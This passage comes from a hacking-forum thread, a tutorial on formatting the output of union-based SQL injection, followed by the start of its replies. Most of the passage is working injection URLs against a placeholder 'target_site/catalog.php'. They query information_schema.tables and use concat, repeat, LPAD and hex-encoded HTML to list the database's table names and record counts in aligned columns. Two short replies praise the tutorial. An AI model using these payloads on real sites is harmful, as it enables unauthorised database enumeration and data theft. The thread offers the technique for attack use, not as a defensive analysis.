#7AC07C">,</span><span style="color: #66CCFF">6</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">7</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">8</span><span style="color: #7AC07C">,<br>(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),&nbsp;(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables</span><span style="color: #7AC07C">)&nbsp;<br></span><span style="color: #66CCFF">where&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">())&nbsp;and&nbsp;(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">in&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,<br>if(&nbsp;</span><span style="color: #66CCFF">table_rows&nbsp;</span><span style="color: #7AC07C">&gt;&nbsp;</span><span style="color: #66CCFF">10</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">repeat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0x266e6273703b</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">15</span><span style="color: #7AC07C">-</span><span style="color: #66CCFF">length</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">)),&nbsp;</span><span style="color: #66CCFF">table_rows</span><span style="color: #7AC07C">),&nbsp;</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)<br>))))</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)--&nbsp;-&nbsp;<br></span></code></div></div></div><br>and in result we can see table names are now separated from records count:<br><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/5ddf332cb40f8d2c0656d7d2e45fcc6c.jpg" alt="[Image: 5ddf332cb40f8d2c0656d7d2e45fcc6c.jpg]" border="0"><br><br>But
 we have one problem. It seems table names don't have same height. Well,
 they have. But we can't see that clearly because we don't use mono 
spaced font where each character occupy the same amount of horizontal 
space (fixed-pitch, fixed-width, non-proportional font). Letter <span style="color: #00BFFF;"><span style="font-weight: bold;">i</span></span> has same width as letter <span style="color: #00BFFF;"><span style="font-weight: bold;">O</span></span><br><br><br><span style="font-size: large;"><span style="color: #FFA500;"><span style="font-weight: bold;">Step #4</span></span></span><br><br>Let's add mono spaced font like <span style="color: #FFD700;">courier</span> with command:<br><br><span style="color: #00BFFF;">&lt;font face=courier&gt;</span> --&gt; in hex <span style="color: #32CD32;">0x3c666f6e7420666163653d636f75726965723e</span><br><br>to our command:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">target_site</span><span style="color: #7AC07C">/</span><span style="color: #66CCFF">catalog</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">php</span><span style="color: #7AC07C">?</span><span style="color: #66CCFF">cat_id</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">29</span><span style="color: #7AC07C">&amp;</span><span style="color: #66CCFF">brend</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">180</span><span style="color: #7AC07C">)&nbsp;and&nbsp;</span><span style="color: #66CCFF">0&nbsp;union&nbsp;select&nbsp;1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">3</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">4</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">5</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">6</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">7</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">8</span><span style="color: #7AC07C">,<br>(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),&nbsp;(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables</span><span style="color: #7AC07C">)&nbsp;<br></span><span style="color: #66CCFF">where&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">())&nbsp;and&nbsp;(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">in&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">0x3c666f6e7420666163653d636f75726965723e</span><span style="color: #7AC07C">,<br>if(&nbsp;</span><span style="color: #66CCFF">table_rows</span><span style="color: #7AC07C">&gt;</span><span style="color: #66CCFF">10</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">repeat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0x266e6273703b</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">15</span><span style="color: #7AC07C">-</span><span style="color: #66CCFF">length</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">)),&nbsp;</span><span style="color: #66CCFF">table_rows</span><span style="color: #7AC07C">),&nbsp;</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)<br>))))</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)--&nbsp;-&nbsp;<br></span></code></div></div></div><br>and result is much better. We clearly see from position of record count numbers all table names have same height:<br><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/337d4f8ea0ee3b3207ed481a10ba8ac2.jpg" alt="[Image: 337d4f8ea0ee3b3207ed481a10ba8ac2.jpg]" border="0"><br><br><br><span style="font-size: large;"><span style="color: #FFA500;"><span style="font-weight: bold;">Step #5</span></span></span><br><br>So
 first column with table names is properly formatted. Let's do the same 
with table record numbers. They must be right aligned, so we will use 
same principle, expect we will add hard spaces BEFORE records count.<br><br>First we must choose height of that column with records count. We will choose 5 characters.<br><br><span style="color: #FFA500;">repeat( 0x266e6273703b, 5-length(table_rows) )</span><br><br>Command
 returns number of repeated hard spaces missing to total length of 5 
characters, based on length of table records count for each table. If 
records count length is 5 characters (numbers) it will return 0 hard 
spaces. If records count length is 3 it will return us 2 hard spaces.<br><br>Let's add that block of hard spaces BEFORE <span style="color: #32CD32;">table_rows</span> command:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">target_site</span><span style="color: #7AC07C">/</span><span style="color: #66CCFF">catalog</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">php</span><span style="color: #7AC07C">?</span><span style="color: #66CCFF">cat_id</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">29</span><span style="color: #7AC07C">&amp;</span><span style="color: #66CCFF">brend</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">180</span><span style="color: #7AC07C">)&nbsp;and&nbsp;</span><span style="color: #66CCFF">0&nbsp;union&nbsp;select&nbsp;1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">3</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">4</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">5</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">6</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">7</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">8</span><span style="color: #7AC07C">,<br>(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),&nbsp;(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables</span><span style="color: #7AC07C">)&nbsp;<br></span><span style="color: #66CCFF">where&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">())&nbsp;and&nbsp;(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">in&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">0x3c666f6e7420666163653d636f75726965723e</span><span style="color: #7AC07C">,<br>if(&nbsp;</span><span style="color: #66CCFF">table_rows</span><span style="color: #7AC07C">&gt;</span><span style="color: #66CCFF">10</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">repeat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0x266e6273703b</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">15</span><span style="color: #7AC07C">-</span><span style="color: #66CCFF">length</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">)),&nbsp;<br></span><span style="color: #66CCFF">repeat</span><span style="color: #7AC07C">(&nbsp;</span><span style="color: #66CCFF">0x266e6273703b</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">5</span><span style="color: #7AC07C">-</span><span style="color: #66CCFF">length</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_rows</span><span style="color: #7AC07C">)&nbsp;),&nbsp;</span><span style="color: #66CCFF">table_rows</span><span style="color: #7AC07C">),&nbsp;</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)<br>))))</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)--&nbsp;-&nbsp;<br></span></code></div></div></div><br>and we get final result with left aligned table name column and right aligned column with records count:<br><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/d81b9163c753309db8108fafec46b806.jpg" alt="[Image: d81b9163c753309db8108fafec46b806.jpg]" border="0"><br><br>All tasks in challenge solved <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br>As we see with few additional functions we can make our SQLi output much nicer.<br><br>For some tasks we can use also some other functions like <span style="font-weight: bold;"><span style="color: #00BFFF;">LPAD </span></span>or <span style="font-weight: bold;"><span style="color: #00BFFF;">RPAD</span></span><br><br><br><span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #00BFFF;">LPAD</span></span></span><br><br><span style="color: #FFD700;">Task: </span><br>display numbering of table names. All numbers should have same height of 3 numbers.<br><br><span style="color: #32CD32;">How can we do it?</span><br><br>We will re-use command for showing all table names in primary database from top of this tutorial:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">target_site</span><span style="color: #7AC07C">/</span><span style="color: #66CCFF">catalog</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">php</span><span style="color: #7AC07C">?</span><span style="color: #66CCFF">cat_id</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">29</span><span style="color: #7AC07C">&amp;</span><span style="color: #66CCFF">brend</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">180</span><span style="color: #7AC07C">)&nbsp;and&nbsp;</span><span style="color: #66CCFF">0&nbsp;union&nbsp;select&nbsp;1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">3</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">4</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">5</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">6</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">7</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">8</span><span style="color: #7AC07C">,<br>(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),&nbsp;(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables</span><span style="color: #7AC07C">)&nbsp;<br></span><span style="color: #66CCFF">where&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">())&nbsp;and&nbsp;(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">in&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">))))</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)--&nbsp;-&nbsp;<br></span></code></div></div></div><br>Let's add <span style="color: #FFD700;">table numbering</span> to our list. See my <a href="http://www.hackforums.net/showthread.php?tid=3590961" target="_blank"><span style="text-decoration: underline;">tutorial</span></a> about details.<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">target_site</span><span style="color: #7AC07C">/</span><span style="color: #66CCFF">catalog</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">php</span><span style="color: #7AC07C">?</span><span style="color: #66CCFF">cat_id</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">29</span><span style="color: #7AC07C">&amp;</span><span style="color: #66CCFF">brend</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">180</span><span style="color: #7AC07C">)&nbsp;and&nbsp;</span><span style="color: #66CCFF">0&nbsp;union&nbsp;select&nbsp;1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">3</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">4</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">5</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">6</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">7</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">8</span><span style="color: #7AC07C">,<br>(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),&nbsp;(@</span><span style="color: #66CCFF">running_number</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">),(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables</span><span style="color: #7AC07C">)&nbsp;<br></span><span style="color: #66CCFF">where&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">())&nbsp;and&nbsp;(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">in&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,<br>@</span><span style="color: #66CCFF">running_number</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">running_number</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">2b1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x2e20</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">))))</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)--&nbsp;-&nbsp;<br></span></code></div></div></div><br>Our list with tables is numbered. We put period and space (<span style="color: #32CD32;">0x2e20</span> in hex) after each number and table name after all that. But numbers don't have same height of 3:<br><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/a3bdb5e8207bec86c35cfad10a909cd9.jpg" alt="[Image: a3bdb5e8207bec86c35cfad10a909cd9.jpg]" border="0"><br><br>We will use function <span style="font-weight: bold;"><span style="color: #00BFFF;">LPAD</span></span> to correct that:<br><br><span style="color: #FFA500;">LPAD(str, len, padstr)</span> returns the string <span style="color: #FFD700;">str</span>, left-padded with the string <span style="color: #32CD32;">padstr </span>to a length of <span style="color: #00BFFF;">len </span>characters. We can decide <span style="color: #32CD32;">padstr </span>will be <span style="font-weight: bold;">0</span> (0x30 in hex) and <span style="color: #00BFFF;">len </span>will be <span style="font-weight: bold;">3</span>. String <span style="color: #FFD700;">str </span>we want to display is local variable @running_number increased by 1 (%2b is sign <span style="color: #FFA500;">+</span> in hex)<br><br>LPAD(<span style="color: #FFD700;">@running_number:=@running_number%2b1</span>, <span style="color: #00BFFF;">3</span>, <span style="color: #32CD32;">0x30</span>)<br><br>And our result of command:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">target_site</span><span style="color: #7AC07C">/</span><span style="color: #66CCFF">catalog</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">php</span><span style="color: #7AC07C">?</span><span style="color: #66CCFF">cat_id</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">29</span><span style="color: #7AC07C">&amp;</span><span style="color: #66CCFF">brend</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">180</span><span style="color: #7AC07C">)&nbsp;and&nbsp;</span><span style="color: #66CCFF">0&nbsp;union&nbsp;select&nbsp;1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">3</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">4</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">5</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">6</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">7</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">8</span><span style="color: #7AC07C">,<br>(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),&nbsp;(@</span><span style="color: #66CCFF">running_number</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">),(</span><span style="color: #66CCFF">select&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables</span><span style="color: #7AC07C">)&nbsp;<br></span><span style="color: #66CCFF">where&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">())&nbsp;and&nbsp;(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">in&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,<br></span><span style="color: #66CCFF">LPAD</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">running_number</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">running_number</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">2b1</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">3</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">0x30</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x2e20</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">))))</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)--&nbsp;-&nbsp;<br></span></code></div></div></div><br>will be:<br><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/1b1f2309889a2d9f8706040c0efae070.jpg" alt="[Image: 1b1f2309889a2d9f8706040c0efae070.jpg]" border="0"><br><br>Thanks for reading <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_35512960"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3785325&amp;replyto=35512960" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid35516570" id="pid35516570"></a><table class="tborder" style="margin-top: 5px; " id="post_35516570" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">10-03-2013, 12:18 PM <span id="edited_by_35516570"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;pid=35516570#pid35516570">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=670820"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/ff7e810a872c487d7c0125c187f9271a.jpg" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=670820"><span class="group29">CrႣwn</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">{ crown ~ } $ echo French Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 69<br>Posts: 617<br>Joined: Feb 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=670820"><strong class="reputation_positive">110</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_35516570">Very nice tutorial my friend, this is clearly detailed and I learned some things new :)</div><div class="post_meta" id="post_meta_35516570"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=670820" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3785325&amp;replyto=35516570" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid35516729" id="pid35516729"></a><table class="tborder" style="margin-top: 5px; " id="post_35516729" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">10-03-2013, 12:31 PM <span id="edited_by_35516729"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;pid=35516729#pid35516729">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1907249"><span class="group2">Kaito12</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><img 